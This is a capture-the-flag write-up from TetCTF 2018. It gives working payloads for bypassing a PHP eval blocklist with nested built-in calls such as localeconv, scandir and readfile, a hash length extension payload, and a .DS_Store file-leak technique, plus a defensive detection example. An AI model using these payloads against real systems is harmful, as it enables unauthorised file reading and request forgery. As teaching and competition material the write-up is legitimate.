TetCTF - 2018

Web - PHPlimit Revenge

filter.php
<?php

// Passes only if the input consists of argument-less calls (nested via (?R)) followed by ';', e.g. a(b(c()));
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
{
    // Blocklist (case-insensitive): any '_', any 'm', "info" or "get"
    if(preg_match('/_|m|info|get/i',$_GET['code']))
    {
        die('<strong>va anh dech can gi nhieu ngoai em :(</strong><audio controls autoplay loop hidden><source src="assets/nhac.mp3" type="audio/mpeg"></audio>');
    }
    else
    {
        eval($_GET['code']);
    }
}
else
{
    show_source(__FILE__);
}

?>
I am not familiar with PHP code, but with the mindset of an RE-er... then JUST FUCKING DO IT!
Btw, I joined a while after the contest started (9 AM 4/1/2018), so they had already released phplimit revenge 2. I just needed to read which funcs are filtered by 2 and use that to create my payload.
payload1
import requests

# chr(rand()) is only sometimes ".", so repeat the request until the response has a body
url = "http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(rand()))))));"
r = requests.get(url)
while len(r.content) == 0:
    r = requests.get(url)
print(r.content)

#view-source:http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(ord(join(localeconv()))))))));
payload2
#view-source:http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(ord(join(localeconv()))))))));
flag
<?php

$fl0wer="TetCTF{_Limbo_Escaped!_Welcome_back_to_Real_Life_}";

?>

Web - PHPlimit revenge 2

filter
<?php

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
{
    // Same blocklist as the first challenge, with "strlen", "rand" and "path" added
    if(preg_match('/_|m|info|get|strlen|rand|path/i',$_GET['code']))
    {
        die('<strong>va anh dech can gi nhieu ngoai em :(</strong><audio controls autoplay loop hidden><source src="assets/nhac.mp3" type="audio/mpeg"></audio>');
    }
    else
    {
        eval($_GET['code']);
    }
}
else
{
    show_source(__FILE__);
}

?>
In this challenge, you couldn't use rand() anymore, so to get ".", I use localeconv()
With scandir(), I can print all files in the current directory
Checking the content of the file well_play_but_flag_not_here.php
#view-source:http://45.76.181.81/?code=print(readfile(end(scandir(current(localeconv())))));
<?php

$fl0wer="Flag not here! go to directory's parent directory";

?>
Checking parent folder ".." :
Found flag, now I chdir() to the parent directory :
chdir() succeeded, now I need to create '.' from 1. Here I use some math functions in PHP like sqrt(), exp(), sin(), cos(),...

I love calculatin! <3

I use e^1 = 2.7x
I use ord('2') = 50
I use sqrt(50) = 7.x
I use ceil(7.x) = 8
ord('8') = 56
octdec(56) = 46
chr(46) = '.', so I got '.' huehuehuehue
exp(1) = e^1 = 2.xxxx
ord(2) = 50
sqrt(50) = 7.xx
ceil(7.x) = 8
ord('8') = 56
octdec(56) = 46

chr(46) = '.'
From now on, it is similar to phplimit revenge 1, just read the flag. Final payload:
final-payload
view-source:http://45.76.181.81/?code=print(readfile(end(scandir(chr(octdec(ord(ceil(sqrt(ord(exp(chdir(next(scandir(current(localeconv())))))))))))))));
flag
<?php

$flower="TetCTF{__Hey___PhP___Master___}";

?>
Thanks @Ariana for teaching me to think in multiple bases/dimensions

Web - IQ Test 2

challenge.php
https://pastebin.com/7zdc5DNX
This is a challenge about hash length extension. I used the tool below to calculate saved and hash for level13
https://github.com/iagox86/hash_extender
payload
hash: 6ac223512cea8d11c0fdf14dccbfbe62
saved: c2VlZD10cnVlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAAAAAAAmbGV2ZWw9eGlpaQ==
Now I have hash and saved, so I created the request with Burp Suite
Finally
TetCTF{__Happy_new_Y3aR__!!_H3re_Your_Flower_}
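A defender's view of a value like the one above, as an added example that is not from the original write-up or the challenge: it finds the MD5 glue padding inside a submitted value (a detection signal for length extension) and shows the HMAC construction that the trick does not work against. MD5, the 11-byte key and all function names are assumptions, since the challenge source is only linked and not shown here.

```python
import base64
import hashlib
import hmac
import struct


def md5_glue(total_len):
    """MD5 padding for a total_len-byte message: 0x80, zeros, 64-bit LE bit count."""
    zeros = (55 - total_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", total_len * 8)


def dissect(value, max_key_len=64):
    """Return (original, appended, key_len) if value embeds MD5 glue padding, else None."""
    start = value.find(b"\x80")
    while start != -1:
        for key_len in range(max_key_len + 1):
            glue = md5_glue(key_len + start)
            if value.startswith(glue, start):
                return value[:start], value[start + len(glue):], key_len
        start = value.find(b"\x80", start + 1)
    return None


def sign(key, data):
    """HMAC-SHA256 tag; unlike hash(key + data), it cannot be extended without the key."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify(key, data, tag):
    """Constant-time comparison of the expected and supplied tags."""
    return hmac.compare_digest(sign(key, data), tag)


# Constructed sample shaped like the `saved` value above: "seed=true", glue
# padding for an assumed 11-byte key, then "&level=xiii".
SAMPLE_B64 = base64.b64encode(
    b"seed=true" + md5_glue(11 + 9) + b"&level=xiii").decode()
KEY = b"example-key"  # hypothetical 11-byte server secret

if __name__ == "__main__":
    submitted = base64.b64decode(SAMPLE_B64)
    print("glue padding found:", dissect(submitted))
    tag = sign(KEY, b"seed=true")
    print("original accepted:", verify(KEY, b"seed=true", tag))
    print("extended accepted:", verify(KEY, submitted, tag))
```

A parameter that decodes to text, a 0x80 byte, a run of zero bytes and a plausible bit count is worth alerting on wherever a keyed hash protects client-held state.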

Web - File

I already met this kind of challenge before in Matesctf 2018 round 2
Tried dirsearch :
Extract file /.DS_Store with this tool
https://github.com/lijiejie/ds_store_exp
Check h1ddenn
flag
TetCTF{__DS_Store__seems_sad__}

Last words & Credits

My dream team! <3
Last modified 2yr ago